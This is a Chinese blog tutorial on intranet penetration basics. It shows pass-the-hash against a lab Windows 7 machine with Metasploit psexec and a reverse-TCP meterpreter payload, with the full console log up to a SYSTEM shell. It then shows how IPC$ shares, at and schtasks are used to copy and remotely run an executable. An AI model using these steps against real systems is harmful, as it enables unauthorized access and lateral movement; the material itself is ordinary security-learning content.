内网必修-hash传递-ipc$

这些是刚接触内网的时候了解到的,之前的blog也是写有的。

hsah传递

详细原理就看这里:刨根问底:Hash传递攻击原理探究

测试环境:(本机)

  • 目标机:
    Windows 7 Ultimate
    192.168.1.106
    
  • 攻击机:
    Linux 4.6.0-kali1-amd64 
    192.168.1.107 
    
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(psexec) > set LPORT 1024
LPORT => 1024
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.107 yes The listen address
LPORT 1024 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(psexec) > set smbuser rcoil
smbuser => rcoil
msf exploit(psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
smbpass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.107:1024
[*] 192.168.1.106:445 - Connecting to the server...
[*] 192.168.1.106:445 - Authenticating to 192.168.1.106:445 as user 'rcoil'...
[*] 192.168.1.106:445 - Selecting PowerShell target
[*] 192.168.1.106:445 - Executing the payload...
[+] 192.168.1.106:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.107:1024 -> 192.168.1.106:50209) at 2017-03-02 06:20:15 +0800
meterpreter > shell
Process 3460 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7600]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Windows\system32>whoami
whoami
nt authority\system

ipc$

内网渗透里面不管域还是工作组最先需要介绍的就是ipc连接,这个是内网渗透必修科目,后面绝大多数操作都要基于ipc连接。

ipc$的作用

利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息。
dir、copy、xcopy、move、type等参数都可以使用UNC路径(何为UNC路径?简单来讲以\开头的路径就是UNC路径)。
ipc$-1

计划任务

说到ipc$,最多的就会提到atschtasks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\Users\John\Desktop>md \\192.168.1.67\c$\users\public\base\
C:\Users\John\Desktop>copy base.exe \\192.168.1.67\c$\users\public\base\
1 file(s) copied.
C:\Users\John\Desktop>copy bat.bat \\192.168.1.67\c$\users\public\base\
1 file(s) copied.
C:\Users\John\Desktop>dir \\192.168.1.67\c$\users\public\base\
Volume in drive \\192.168.1.67\c$ is Windows 7
Volume Serial Number is 44F3-57F8
Directory of \\192.168.1.67\c$\users\public\base
08/30/2017 02:35 AM <DIR> .
08/30/2017 02:35 AM <DIR> ..
08/11/2013 12:40 AM 43,520 base.exe
08/30/2017 02:32 AM 32 bat.bat
2 File(s) 43,552 bytes
2 Dir(s) 55,193,870,336 bytes free
C:\Users\John\Desktop>at \\192.168.1.67 4:40 c:\users\public\base\bat.bat
dded a new job with job ID = 1
...
删除at任务
at /delete /y

schtasks是at的升级版。

1
2
3
schtasks /create /tn "base" /tr c:\users\public\base\base.bat /sc once /st 4:50 /S 192.168.1.67 /RU System /u admin /p "1"
schtasks /run /tn "base" /S 192.168.1.67 /u admin /p "1" /i #立即执行
schtasks /F /delete /tn "base" /S 192.168.1.67 /u admin /p "1"

/create表示创建计划任务,/tn表示任务名,/tr指定运行的文件,/sc是任务运行频率,/st是执行时间,/s指定远程机器名或ip地址,/ru指定运行任务的用户权限,这里指定为最高的SYSTEM,/i表示立即运行,/F表示如果指定的任务已经存在,则强制创建任务并抑制警告,/delete是删除任务。

!坚持技术分享,您的支持将鼓励我继续创作!